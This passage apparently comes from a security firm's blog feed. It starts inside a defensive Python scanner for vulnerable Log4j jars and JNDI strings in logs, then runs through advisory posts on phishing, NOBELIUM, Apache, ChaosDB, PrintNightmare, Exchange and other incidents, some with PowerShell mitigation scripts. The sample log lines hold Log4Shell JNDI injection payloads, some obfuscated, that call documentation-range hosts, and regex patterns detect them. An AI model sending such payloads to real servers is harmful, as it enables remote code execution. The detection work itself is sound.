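    if v < DOS_ONLY:
        return "RCE (CVE-2021-44228 range): patch first, internet-facing hosts before all others"
    if v < FIXED:
        return "DoS only: upgrade to 2.17.0"
    return "2.17.0 or later: current as of the Dec 20 guidance"


def classify_jar(jar):
    """jar: path to a .jar, or its bytes. Returns (version, jndi_present, verdict)."""
    src = io.BytesIO(jar) if isinstance(jar, (bytes, bytearray)) else jar
    with zipfile.ZipFile(src) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        jndi_present = JNDI_CLASS in names
    if version is None:
        return (None, jndi_present, "no log4j-core pom.properties: not log4j-core, or a shaded copy")
    verdict = classify_version(version)
    if not jndi_present and FIRST_VULN <= parse_version(version) < FIXED:
        verdict += "; JndiLookup.class removed (Apache's documented workaround), upgrade anyway"
    return (version, jndi_present, verdict)


def scan_tree(root):
    """Classify every *.jar under root. Does not descend into nested war/ear archives."""
    results = {}
    for p in Path(root).rglob("*.jar"):
        try:
            results[str(p)] = classify_jar(p)
        except zipfile.BadZipFile:
            results[str(p)] = (None, False, "not a zip archive")
    return results


def build_test_jar(version, with_jndi=True):
    """Constructed stand-in for log4j-core: only the two entries the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"#generated\nversion={version}\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    return buf.getvalue()


# log inspection: the lookup strings attackers place in headers or parameters
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")   # ${::-j}, ${env:NOPE:-j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalise_lookups(s, rounds=10):
    """Collapse nested lookups so ${${lower:j}ndi:...} becomes ${jndi:...}.
    Best effort: this is not a full Log4j lookup parser."""
    for _ in range(rounds):
        new = _CASE.sub(lambda m: m[2].lower() if m[1].lower() == "lower" else m[2].upper(), s)
        new = _DEFAULT.sub(lambda m: m[1], new)
        if new == s:
            break
        s = new
    return s


def find_jndi(lines):
    return [line for line in lines if _JNDI.search(normalise_lookups(line))]


# constructed access-log lines (documentation IP ranges), not real traffic
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:22:14:01 +0000] "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.6 - - [10/Dec/2021:22:14:07 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.6/x}"',
    '203.0.113.7 - - [10/Dec/2021:22:15:30 +0000] "GET /api HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/y}"',
    '198.51.100.9 - - [10/Dec/2021:22:16:00 +0000] "GET /docs HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.10 - - [10/Dec/2021:22:16:05 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 "-" "curl/7.79.1"',
]
```

A jar with `JndiLookup.class` stripped (Apache's documented workaround for 2.10 and later: delete the class from `log4j-core`) is reported as mitigated but still flagged for upgrade, matching the "migrate to 2.17.0" recommendation above. The log check is a triage aid, not a WAF: attackers varied the encoding far more than the three constructed lines show, so treat a hit as a reason to look at the host, and treat a clean log as no evidence either way.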

Listed below are some additional informational links:

Regarding OneNeck Systems

Regarding OneNeck's systems, no immediate threat has been detected, but our teams are actively reviewing the situation to determine any impact on our products and partners.

Stay Safe from Cyberattacks this Holiday Season https://www.oneneck.com/blog/security/a-security-strategy-for-the-holiday-season/ Wed, 24 Nov 2021 21:00:00 +0000 https://www.oneneck.com/blog/security-a-security-strategy-for-the-holiday-season/

It’s that time of year, where twinkling lights and Santa’s sleigh full of toys are everywhere. But with all the holiday bustle comes additional risk, the risk of mounting security threats as shoppers are eagerly swiping their credit cards while checking gifts off their lists. What does this mean for today’s organization, where the line between corporate and personal devices is blurrier than ever before?

With the rise in remote work, companies and organizations need to update their security policies and controls. Based on IDG’s 2021 Global Intelligence Report, 67% of organizations expect their security budget to increase this year. However, despite the increased security, key gaps remain, and additional policies need to be implemented for the remote workforce.

Be Aware of Holiday Inspired Phishing Emails
It's unfortunate, but the "bad guys" are incredibly skilled at crafting convincing emails. With the holiday season, all sorts of creative phishing emails bombard the end user, who might think they are getting the latest-and-greatest 55" TV for $200, only for malware to be downloaded that can potentially impact everything it touches.

And while TechTarget says most end users “think they know enough about the internet to not fall prey to these attacks, and that the cyberattacks they see in the news couldn’t possibly happen to them,” it’s this false sense of security that can ultimately lead to a disastrous breach.

Educate Your Staff to Watch Out for Phishing Attempts

It’s stats like the above that are keeping many IT leaders up at night. So, what’s an organization to do? OneNeck CISO Katie McCullough says, “It starts with end-user awareness. That’s your biggest potential for risk. It’s the age-old, phishing is the #1 way to exploit a company, and the bad guys are always going to be out in front of that. There’s always detection and prevention you can do at a technology level, but the more you can educate the co-workers in your business to be savvy and don’t click, even though it sounds basic, it’s these best practices that companies must constantly reinforce with their end users. They can invest all they want in technology, but if you’re not focused on training and reinforcing that training with your broad co-worker base, all it takes is one click.”

Key Steps to Prevent Cyber Breaches at Your Organization

Like anything where the human factor is involved, repetition is crucial, as is the right combination of technology and processes. This can include:

  • Annual security-awareness training
  • Quarterly updates, blogs and communication to keep it top of mind
  • The right mix of security technologies to stop malware and block access to malicious sites
  • Anti-phishing training, which enables IT to send fake phishes to employees, exposing the vulnerabilities

Ultimately, don’t fall into the trap of, “It hasn’t happened yet, so why should I worry?” It takes a diligent and continuous approach to mitigating constantly evolving security threats. But with a strategy that considers those personal devices and continuous employee education, the holidays don’t have to be the scariest time of the year.

Want to learn some more useful security tips? Check out our exclusive IT Professional’s Security Strategy Toolkit.

WordPress Plugin Bug Lets Subscribers Wipe Sites (https://www.oneneck.com/blog/security/wordpress-plugin-bug/, Fri, 29 Oct 2021 23:24:00 +0000)

A high-severity security flaw found in a WordPress plugin that has 8,000+ active installs can allow authenticated attackers to reset and wipe vulnerable websites.

This plugin, Hashthemes Demo Importer, was developed to assist admins when importing demos for WordPress themes to import the full demo with one click.

According to Wordfence’s QA engineer and threat analyst Ram Gall, “The flaw gives any authenticated attacker, even the subscriber-level user with minimal permissions, the ability to reset WordPress sites by zapping virtually all its databases and uploaded media.” He goes on to say that “if exploited, the flaw would render a website running the vulnerable plugin completely unrecoverable, unless of course its owners had properly backed it up.”

Note that a corrected version (version 1.0.7) has been uploaded by the plugin’s developer.

While this vulnerability is specific to WordPress users, it’s a prime example that plugins expand the attack surface. OneNeck CISO Katie McCullough states, “Best practice is to use the fewest number of plugins needed to complete work, and uninstall any plugins not being used. And specific to this vulnerability, ensure WordPress and plugins are updated to the latest versions and have the most recent patches applied.”

An effective security defense really starts with the basics. As Katie states, “Some companies think they can deploy patches on a quarterly basis or put them off indefinitely because they want to avoid downtime, but we’ve seen how costly such decisions can be.”

So, the moral of the story: be diligent in your updates and patching. Good cyber hygiene can be what keeps your organization safe from bad actors.

Interested in talking to one of our security experts? Contact us today.

NOBELIUM is Targeting IT Service Providers (https://www.oneneck.com/blog/security/nobelium-is-targeting-it-providers/, Tue, 26 Oct 2021 02:21:00 +0000)

Today the Microsoft Threat Intelligence Center (MSTIC) released a statement regarding the threat actor, NOBELIUM, who launched a campaign against cloud service providers (CSPs), managed service providers (MSPs) and other IT services organizations. By targeting IT providers, they are attempting to gain access to privileged customer accounts so they may move laterally throughout the cloud environment and gain access to downstream customers and systems.

Microsoft Recommendations to Protect Privileged Access

Microsoft recommends that customers that use service providers with elevated privileges review and implement the following actions to help mitigate and remediate the recent NOBELIUM activity.

1. Review, audit, and minimize access privileges and delegated permissions

  • Review, harden, and monitor all tenant administrator accounts: All organizations should thoroughly review all tenant admin users, including those associated with Administer On Behalf Of (AOBO) in Azure subscriptions, and verify the authenticity of the users and their activity. We strongly encourage the use of strong authentication for all tenant administrators, review of devices registered for use with MFA, and minimizing the use of standing high-privilege access. Continue to reinspect all active tenant admin user accounts and check audit logs on a regular basis to verify that high-privilege access is not granted or delegated to admin users who do not require it to do their job.
  • Review service provider permissions access from B2B and local accounts: In addition to using the delegated administrative privilege capabilities, some cloud service providers use business-to-business (B2B) accounts or local administrator accounts in customer tenants. We recommend that you identify whether your cloud service providers use these, and if so, ensure those accounts are well-governed, and have least-privilege access in your tenant. Microsoft recommends against the use of “shared” administrator accounts. Review the detailed guidance on how to review permissions for B2B accounts.

2. Verify multi-factor authentication (MFA) is enabled and enforce conditional access policies.

3. Review and audit logs and configurations.

  • Review and audit Azure AD sign-ins and configuration changes: Authentications of this nature are audited and available to customers through the Azure AD sign in logs, Azure AD audit logs, and the Microsoft 365 compliance center (formerly in the Exchange Admin Center). We recently added the capability to see sign-ins by partners who have delegated admin permissions. You can see a filtered view of these sign-ins by navigating to the sign-in logs in the Azure AD admin portal, and adding a filter ‘Cross-tenant access type: Service provider’ on the ‘User-sign ins (non-interactive)’ tab.
  • Review Existing Log Availability and Retention Strategies: Investigating activities conducted by malicious actors places a large emphasis on having adequate log retention procedures for cloud-based resources including Office 365. Various subscription levels have individualized log availability and retention policies which are important to understand prior to forming an incident response procedure.

What does OneNeck do to keep our customers safe?

As noted in Microsoft’s statement, MSPs like OneNeck are primary targets of this type of cyberattack. To ensure we have appropriate protections, detections and response, we leverage the Center for Internet Security’s (CIS) Critical Security Controls, a series of cybersecurity actions prioritized by their criticality in preventing cyberattacks. OneNeck completes a CIS Critical Security Controls assessment annually, along with incorporating the controls as part of any new service.

While we assess against all the controls, we also adhere to other top priority controls:

  • Inventory and control of hardware and software assets: Our ReliaCloud environment is maintained in secure data centers that meet or exceed all physical and environmental controls (per our ISO/IEC 27001:2013 certification). We complete regular scans of our environment to assure only known devices are within the environment, and we maintain a CMDB (Configuration Management Database), per ITIL good practices, for all managed devices and software.
  • Vulnerability management: OneNeck continuously acquires, assesses and takes action on new information in order to identify vulnerabilities, remediate them and minimize the window of opportunity for attackers. Activities include:
    • Identifying vulnerabilities through vendor notifications, industry-leading security research organizations and OneNeck’s own security testing program.
    • Completing regular authenticated scanning and determining the appropriate risk rating for the vulnerability type, the system’s usage and the impacted system’s architecture.
    • Closing the loop through automated software that ensures operating systems are running the most recent security updates provided by the vendors.
  • Controlled use of administrative privileges: OneNeck uses non-default and unique passwords for all assets within ReliaCloud. Privileged accounts are managed in a secure password management system. Additionally, OneNeck leverages a remote access system that requires multi-factor authentication and tracks all privileged access and activities.
  • Secure configurations: OneNeck maintains security configuration standards for all authorized operating systems and software. We store all master images and templates on securely configured servers and assure that only authorized changes are made to the images.
  • Monitoring and analysis of audit logs: OneNeck has local logging on all critical infrastructure, and ensures all appropriate logs are aggregated to a central log management system for analysis and review. OneNeck’s Security Operations Center (SOC) leverages our Security Information and Event Management (SIEM) platform, which provides correlation and analysis of all presented logs. Additionally, our SOC monitors and is alerted on critical situations 24×7 to assure the security of all OneNeck environments, in particular ReliaCloud.

As identified in the CIS Controls, we annually use third-party penetration (pen) testers to ensure the controls put in place are effective. A recent pen test revealed OneNeck has “Strong External Network Security Controls” in place and that our systems and services are well-patched and maintained.

Additionally, we stay informed through various mechanisms (vendors, industry, governments, dark web monitoring, etc.) to ensure we are aware of any emerging threats, in particular against MSPs. In a recent release, the FBI identified that most of these attacks involved compromised credentials, followed by pivoting between MSP and customer shared networks. The most common attack vectors include spear phishing, malicious web content and credential theft. We have multiple controls in place for email, including requiring MFA, blocking phishing emails, alerting on risky sign-ins and impossible travel, along with regular end-user training and testing. Additionally, there is a whole series of controls we focus on as an MSP, which include:

  • Ensure MSP accounts are not assigned to administrator groups.
  • Restrict MSP accounts to only the systems they manage.
  • Ensure MSP account passwords adhere to organizational policies.
  • Use a dedicated Virtual Private Network (VPN) for MSP connection.
  • Restrict VPN traffic to and from MSP.
  • Ensure internet-facing networks reside on separate physical systems.
  • Separate internal networks by function, location, and risk profile.
  • Use firewalls to protect server(s) and designated high-risk networks.
  • Ensure internal and external Domain Name System (DNS) queries are performed by dedicated servers.
  • Disable or block all network services that are not required at network boundary.

Along with all the controls we manage and review above, our annual attestations for SOC 1 Type II, SOC 2 Type II, and HIPAA further validate our commitment to a secure environment.

We understand that maintaining a strong risk profile is daunting as the threat landscape continues to grow. But as your partner, we are here to help. Don’t go it alone. Talk to one of our experienced security specialists today.

Apache HTTP Server 2.4.49 Vulnerability (https://www.oneneck.com/blog/security/apache-http-server-vulnerability/, Thu, 07 Oct 2021 22:03:00 +0000)

Two days ago, The Apache Foundation disclosed a path traversal and file disclosure flaw in Apache HTTP Server 2.4.49 (an open-source web server for Unix and Windows that is among the most widely used web servers), tracked as CVE-2021-41773, as actively being exploited in the wild. The advisory does not indicate when exploitation of CVE-2021-41773 was detected, but the exploitation drove the expedited release of a patch by Apache.

This is a threat because a bad actor could exploit this vulnerability and gain access to database credentials through the web server, leading to leaked sensitive content, like source code, passwords, configuration files and other confidential information.

These issues only impact Apache HTTP Server 2.4.49, and a patch is now available. It is important that anyone running Apache HTTP Server 2.4.49 update immediately.

If you’re interested in learning more or are impacted by this vulnerability, our security experts are here to help. We’ve got your back!

Cosmos DB Vulnerability: Error on the Side of Caution (https://www.oneneck.com/blog/cloud/cosmos-db-vulnerability-chaosdb/, Fri, 27 Aug 2021 22:49:00 +0000)

On August 26, Internet security firm, Wiz, announced it had found a security flaw in Microsoft Azure Cosmos DB, a global multi-model NoSQL store used by thousands of enterprises around the world.

The exploit, named “ChaosDB,” allows bad actors to access the primary keys to a Cosmos DB account. The exploit was found in the recently added Jupyter Notebook feature of Cosmos DB.

In response to this threat, Microsoft immediately disabled this feature for a full security audit.

Our Recommendation

OneNeck recommends that everyone who has implemented a Cosmos DB account immediately regenerate the primary and secondary access keys. This will ensure continued data privacy. While Microsoft doesn’t believe any customer data has been leaked, your keys should be regenerated immediately to be safe.
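As an added example, not code from the OneNeck post or from Microsoft, here is a PowerShell routine that carries out the key regeneration recommended above in an order that keeps running applications connected, and that also rotates the read-only keys, which the post does not mention. It assumes the Az.CosmosDB module is installed, a Connect-AzAccount session exists, and the resource group and account names are yours; the scriptblock you pass in is where the new key would be pushed to your applications.

```powershell
# Added example (not OneNeck's or Microsoft's code). Assumes Az.CosmosDB and an
# existing Connect-AzAccount session. Rotation order matters: a key is only
# regenerated while no client is using it, so nothing loses connectivity.
function Invoke-CosmosKeyRotation {
    param(
        [Parameter(Mandatory)] [string]$ResourceGroupName,
        [Parameter(Mandatory)] [string]$AccountName,
        # Called with the key every client should switch to (your deployment step)
        [Parameter(Mandatory)] [scriptblock]$UpdateClients
    )

    # 1. Regenerate the secondary key first; clients normally use the primary, so this is safe.
    New-AzCosmosDBAccountKey -ResourceGroupName $ResourceGroupName -Name $AccountName -KeyKind 'secondary' | Out-Null
    $keys = Get-AzCosmosDBAccountKey -ResourceGroupName $ResourceGroupName -Name $AccountName -Type 'Keys'

    # 2. Move every client onto the fresh secondary key.
    & $UpdateClients $keys['SecondaryMasterKey']

    # 3. The old primary is now unused: regenerate it, which invalidates any leaked copy.
    New-AzCosmosDBAccountKey -ResourceGroupName $ResourceGroupName -Name $AccountName -KeyKind 'primary' | Out-Null
    $keys = Get-AzCosmosDBAccountKey -ResourceGroupName $ResourceGroupName -Name $AccountName -Type 'Keys'

    # 4. Move clients back to the new primary so the next rotation starts from the same state.
    & $UpdateClients $keys['PrimaryMasterKey']

    # Read-only keys also grant data access, so rotate them too (no client switch needed
    # if nothing uses them; if something does, apply the same swap pattern).
    foreach ($kind in 'primaryReadonly', 'secondaryReadonly') {
        New-AzCosmosDBAccountKey -ResourceGroupName $ResourceGroupName -Name $AccountName -KeyKind $kind | Out-Null
    }
}

# Example invocation with assumed names. The scriptblock only reports here; in practice
# it would write the key to Key Vault or app configuration and wait for clients to reload.
Invoke-CosmosKeyRotation -ResourceGroupName 'rg-prod' -AccountName 'cosmos-prod' -UpdateClients {
    param($NewKey)
    Write-Host "Switch clients to the newly generated key (length $($NewKey.Length))"
}
```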

If you have any questions regarding this vulnerability, we are here to help. Don’t hesitate to reach out.

Keep Moving Forward. We Have Your Back.

Windows Print Spooler Vulnerability PrintNightmare Zero Day (https://www.oneneck.com/blog/security/windows-print-spooler-vulnerability-aka-printnightmare-zero-day/, Fri, 02 Jul 2021 20:11:00 +0000)

The PrintNightmare Zero Day vulnerability allows attackers with a local presence on a device to execute malicious code that exploits the flaw in the Windows Print Spooler service, granting SYSTEM access. Specifically, an attacker can exploit the vulnerability by placing the exploit DLL in a subdirectory under “C:\Windows\System32\spool\drivers”. Microsoft’s notification for this vulnerability can be found here:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

Windows operating systems that run the Windows Print Spooler service by default can be exploited via local access to the endpoint. This vulnerability has been classified with a local attack vector, which means that an attacker would need to have already authenticated to the device running the exploitable Windows Print Spooler service. Per Microsoft’s recommendation, customers should prioritize assessing the need for print spooling on domain controllers.

The recommended mitigations to this known vulnerability include the following:

  • Stop and disable the Windows Print Spooler service on machines that do not require it.
  • For systems that require the Windows Print Spooler service to be running, enable the PrintService-Operational event logging.
  • For systems that require the Windows Print Spooler service to be running, ensure they are not exposed to the internet.
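The first two mitigations above as an added PowerShell example (not from the OneNeck post or Microsoft’s guidance): it reports the spooler state on each host, disables the service where it is not needed, and enables the PrintService/Operational log where it must keep running. The host names, the list of hosts that genuinely need printing, and the choice to treat domain controllers as not needing the spooler are assumptions; the third mitigation (internet exposure) is a network control and is not covered here.

```powershell
# Added example (not OneNeck's or Microsoft's code). Requires PowerShell remoting
# and local admin rights on the targets. Host lists below are assumed.
$HostsThatNeedPrinting = @('PRINT-SRV-01')          # assumption: only machine that must keep Spooler
$Targets               = @('DC-01', 'DC-02', 'PRINT-SRV-01')   # assumption: hosts to review

function Get-SpoolerPosture {
    param([Parameter(Mandatory)] [string]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        $svc  = Get-Service -Name Spooler -ErrorAction SilentlyContinue
        # Win32_ComputerSystem.DomainRole: 4 = backup DC, 5 = primary DC
        $role = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole
        # The operational log is disabled by default; it records driver installs
        $log  = Get-WinEvent -ListLog 'Microsoft-Windows-PrintService/Operational' -ErrorAction SilentlyContinue
        $status = if ($svc) { $svc.Status.ToString() }    else { 'NotInstalled' }
        $start  = if ($svc) { $svc.StartType.ToString() } else { 'n/a' }
        [pscustomobject]@{
            Computer           = $env:COMPUTERNAME
            SpoolerStatus      = $status
            SpoolerStartType   = $start
            IsDomainController = ($role -ge 4)
            OperationalLogOn   = [bool]($log -and $log.IsEnabled)
        }
    }
}

function Set-SpoolerMitigation {
    param(
        [Parameter(Mandatory)] [string]$ComputerName,
        [Parameter(Mandatory)] [bool]$NeedsPrinting
    )
    Invoke-Command -ComputerName $ComputerName -ArgumentList $NeedsPrinting -ScriptBlock {
        param([bool]$NeedsPrinting)
        if (-not $NeedsPrinting) {
            # Mitigation 1: stop and disable the service where it is not required
            Stop-Service -Name Spooler -Force -ErrorAction SilentlyContinue
            Set-Service  -Name Spooler -StartupType Disabled
        }
        else {
            # Mitigation 2: keep it running but turn on the operational log so
            # driver activity is auditable by the SOC
            wevtutil.exe set-log 'Microsoft-Windows-PrintService/Operational' /enabled:true
        }
    }
}

foreach ($t in $Targets) {
    $before = Get-SpoolerPosture -ComputerName $t
    # Assumption: domain controllers are treated as not needing the spooler,
    # which is where the post says to prioritize the assessment.
    $needs = ($HostsThatNeedPrinting -contains $t) -and (-not $before.IsDomainController)
    Set-SpoolerMitigation -ComputerName $t -NeedsPrinting $needs
    # Re-read and print the posture so the change is visible in the run log
    Get-SpoolerPosture -ComputerName $t | Format-Table -AutoSize
}
```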

This is an evolving situation and we will continue to provide updates as they become available.

If you have questions, your OneNeck team is here to help. OneNeck customers, please contact the OneNeck Service Desk at 800-272-3077.

What is Shadow IT? Know the Risks and How to Control It (https://www.oneneck.com/blog/cloud/managing-shadow-it/, Thu, 17 Jun 2021 17:00:00 +0000)

No doubt about it — if your company has employees, you have shadow IT. According to a survey conducted by Stratecast and Frost & Sullivan, 80% of employees say they use applications on the job that aren’t approved by IT.

Shadow IT brings up security, integration and operational challenges and companies have three paths to choose from when it comes to dealing with it — they can accept it, try to suppress it or ignore it. The latter option may be the path of least resistance but can put the organization at tremendous risk. Ignoring shadow IT can threaten enterprise systems and data, and a security-conscious enterprise must have a plan for effectively dealing with it.

What Is Shadow IT?

Shadow IT is an umbrella term referring to any technology, be it an application or device (smartphone, tablet, laptop, etc.), deployed within an organization without the approval of the IT department. IT departments are often unaware that applications are being used by either individual employees or entire lines of business.

Most employees who adopt unsanctioned solutions do so with good intentions, not to undermine security, but to more effectively do their job. With the plethora of business and productivity applications available and the ease of installing these applications, shadow IT continues to propagate. Oftentimes, the process of seeking official IT approval for new applications is onerous and long, so employees take matters into their own hands. The cloud and mobile are large contributors to the problem.

Common examples of shadow IT include:

  • Productivity apps (Trello, Slack, Asana)
  • Messaging apps on corporate-owned devices (Snapchat, WhatsApp)
  • Physical devices (flash drives, external drives)
  • Cloud storage (Dropbox, Google Drive)
  • Communication apps (Skype, VOIP)

Shadow IT Risks

According to Cisco, 80% of end users use software not cleared by IT, 83% of IT staff admit to using unsanctioned software or services, and only 8% of all enterprises actually know the scope of shadow IT within their organization!

Shadow IT, without a doubt, adds risk to your organization, and your employees are your weak link. Michael Bruemmer, vice president of Experian Data Breach Resolution, explained, “As we have seen in our incident response service that we do for clients, about 80% of all the breaches we service have a root cause in some type of employee negligence.” When non-sanctioned applications and devices are in use, vulnerabilities can be introduced into the infrastructure, and without IT oversight, the root cause is very difficult to find. Some examples of risk include:

  1. Software Asset Management (SAM): Organizations need to track all software applications used and licensing information. Unauthorized software makes this already difficult task nearly impossible, leading to our next risk.
  2. Compliance: Unauthorized applications once discovered can mandate a complete audit of the infrastructure to ensure you are compliant. Organizations who do not take this seriously risk hefty fines from non-compliance.
  3. Testing: IT infrastructures are complex organisms that require management. Introducing new applications without proper testing can compromise the entire infrastructure. Shadow IT also adds more complexity to the entire testing process by having to involve a third party.
  4. Configuration management: Creating a configuration management database (CMDB) and defining relationships between different systems is labor-intensive. When other employees use shadow IT, those systems are not included and can have compatibility issues as a result.

How Do You Control Shadow IT?

Organizations must place a high value on reining in shadow IT and work closely with lines of business to mitigate their risk. Suggestions include:

  • Continuously monitor the network for applications and systems.
  • Conduct an audit, and ask your employees to come forward, promising that they will not face consequences for using shadow IT applications.
  • Create a system for ranking and prioritizing risk. Not all applications outside of IT control are equally threatening.
  • Develop a list of devices approved for BYOD use, and make sure employees know that “jailbroken” devices are prohibited.
  • Develop an internal app store for all applications that have been evaluated and approved for use within the corporate infrastructure.
  • Block applications that are deemed dangerous and require users to seek approval before downloading.

In the long run, CIOs need to develop comprehensive procedures for approving cloud applications that are fast and efficient, so that employees will not need to go around the system in a rogue manner. When employees are given a choice of which devices and applications they can use, it improves productivity, drives innovation and increases morale. So, embrace shadow IT in a way that manages risk and keeps your organization safe and compliant. Explore our cloud solutions or contact us for support in dealing with shadow IT security risks.

Colonial Pipeline a Victim of Ransomware: Are You Safe? (https://www.oneneck.com/blog/security/colonial-pipeline-a-victim-of-ransomware/, Wed, 12 May 2021 18:45:00 +0000)

As pretty much everyone knows by now, Colonial Pipeline, one of the US’ largest pipelines carrying 2.5 million barrels per day (45% of the East Coast’s diesel, gas and jet fuel supply) and spanning from Texas to New Jersey, was forced to proactively shut down on Friday, May 7, due to a cyber attack.

The FBI issued a statement confirming that DarkSide, a well-known cyber-criminal gang, was responsible for the attack. The BBC states that many cyber-security researchers have speculated that the cyber-criminal gang could be Russian, as their software avoids encrypting any computer systems where the language is set as Russian.

It’s a storyline that’s become all too familiar, where ransomware is to blame for cutting a business off at the knees, leaving casualties in its wake far and wide. And while it can be overwhelming trying to combat these onslaughts of attack, it’s a good reminder to stop and assess your current security hygiene…

Are you doing what you can to keep your organization safe?

To effectively protect against cyber threats, you need solutions that:

  • Stop threats at the edge.
  • Control who gets on your network.
  • Simplify network segmentation.
  • Protect users wherever they are.
  • Find and contain problems fast.

But where does one even start? At OneNeck, our security experts believe that a solid place to start with any security strategy is with established security frameworks, such as the CIS Critical Security Controls.

These Controls represent the collective thinking of IT experts across multiple industries and can be used as a guide to assess for good cyber hygiene and provide a prioritized set of actions to address security vulnerabilities. These practical actions, which combine technical security and risk management, can help mitigate the most common attacks against systems and networks and reduce corporate risk. Collectively, they can help you take a defense-in-depth approach to building your security program.

So, don’t wait until it’s too late to address the security gaps that can be exploited by bad actors. As OneNeck CISO, Katie McCullough, says… “To avoid becoming a ransomware victim, businesses should take actions that include putting security processes in place to ensure your IT environment is fully protected. It can be a journey, but you don’t have to go it alone.”

If you’re interested in talking with one of our security experts, we’re here to help.

Learn more from OneNeck’s CISO about the Anatomy of Ransomware in this informative blog.

CVE-2021-26855 – Microsoft Exchange Server Vulnerability (https://www.oneneck.com/blog/security/microsoft-exchange-server-remote-code-execution-vulnerability/, Thu, 04 Mar 2021 22:32:00 +0000)

Over the last couple of days, Microsoft released out-of-band security updates to address multiple vulnerabilities in Microsoft Exchange that could allow an unauthenticated, remote attacker to exploit an Exchange Server by sending a specially crafted HTTP request over port 443 allowing the attacker to authenticate.

These are the recommended security updates:

  • Update KB5000871 has been released for the latest release of each of the three most recent versions of Microsoft Exchange (2013, 2016 and 2019), and for the previous release of the currently supported versions (2016 and 2019).
  • Update KB5000978 has been released for the latest release of Microsoft Exchange 2010.

At OneNeck, we take these threats very seriously and are actively creating patching baselines, working on plans and scheduling to apply these vulnerability patches with customers that have Managed Exchange Services with OneNeck.

Additional Information From Microsoft:

Mitigations (From Microsoft CVE)

The initial attack requires the ability to make an untrusted connection to Exchange server port 443. This can be protected against by restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access. Using this mitigation will only protect against the initial portion of the attack. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. We recommend prioritizing installing updates on Exchange Servers that are externally facing.

FAQ (From Microsoft CVE)

Q: Is this vulnerability being used in an active attack?

A: Yes. The vulnerability described in this CVE is one of four vulnerabilities that are being exploited in an active attack. The security updates address this attack.

Q: What is the target for this attack?

A: The initial attack in this attack chain targets an Exchange On-prem server that is able to receive untrusted connections from an external source. In addition, the Exchange server would need to be running Microsoft Exchange Server 2013, 2016, or 2019.

Source Links:

If you have any questions or concerns that you’d like to discuss with a OneNeck security expert, we’re here to help.

FireEye Red Team Tools Breach – No One’s Safe. (https://www.oneneck.com/blog/security/fireeye-breach-no-ones-safe/, Thu, 17 Dec 2020 22:30:00 +0000)

Data breaches are everywhere, and everyone is susceptible – even the security experts. This was recently put front and center by the state-sponsored adversary that stole FireEye’s Red Team tools.

This particular breach was especially eye-opening, as FireEye is not only a well-recognized security company, but the stolen data includes the custom penetration tools utilized by FireEye’s Red Team, a group of security professionals that specialize in cracking the code on attackers.

As a result of the breach, FireEye provided extensive information and countermeasures for security professionals to implement in defense of the stolen tools.

This type of breach is sure to make any security professional wince. But if you’re a tech leader at a mid-market organization with limited budget and minimal-to-no in-house security expertise, you have to wonder if you even have a chance against the bad guys. We’re here to tell you that you do.

While there are a plethora of tools on the market, an important security control is protecting your network boundary with a next generation firewall. Many organizations are still using outdated firewalls that are less efficient, less effective and vulnerable to attack – and often not integrated into the rest of the security point-products. You need a modern firewall that can block threats and quickly mitigate those that do breach your perimeter.

As a Cisco partner, we’ve seen firsthand the power of Cisco’s integrated system of security tools, with the next-generation firewall (Firepower) at its core. These tools work together to prevent breaches, automate operations, save you time and uncover and eliminate threats everywhere, fast. Firepower is backed by an advanced threat team (Talos, one of the largest commercial threat intelligence teams) at the ready 24×7 to ensure Cisco’s security tools are optimized to recognize and address advanced threats as they happen.

And as an added bonus, OneNeck can help you further by managing your next-gen firewall 24×7, so that we’re here on that wall, keeping watch, ensuring all advanced threat features are updated immediately and enabling your team to focus on other tasks outside of watching for attackers. It may seem overwhelming when even the big guys get breached, but you’re not alone. Let’s work together to keep the bad guys out!

OneNeck’s Response to the FireEye Breach
https://www.oneneck.com/blog/security/onenecks-response-to-the-fireeye-breach/
Thu, 17 Dec 2020 02:00:00 +0000

Specific to the FireEye breach, which identified a widespread compromise of SolarWinds software, OneNeck continues to ensure we are following security industry and vendor recommendations for securing our environment specific to any of the Common Vulnerabilities and Exposures (CVEs) and any Indicators of Compromise (IoCs) that become known to be associated with these breaches. The CVEs specifically associated with these breaches have documented solutions from the appropriate vendors that have been made available. Therefore, through our standard process, such as normal patching, OneNeck devices have the appropriate protections. While OneNeck does not leverage the SolarWinds Orion IT monitoring and management software to provide any of our services, we have and continue to:

  • Consume signatures and Indicators of Compromise (IoC) related to the SolarWinds and FireEye compromise into our monitoring and security platforms.
  • Contact our suppliers and vendors to review any use of Solarwinds, and to identify and mitigate any potential risk to OneNeck data or services.

Additionally, to continuously ensure our environment has the appropriate security protections, detections and response, OneNeck leverages the Center for Internet Security’s (CIS) Critical Security Controls, which are a series of cybersecurity actions prioritized by their criticality in preventing cyberattacks. OneNeck completes a CIS Critical Security Controls assessment at least annually, along with incorporating the controls as part of any new service.

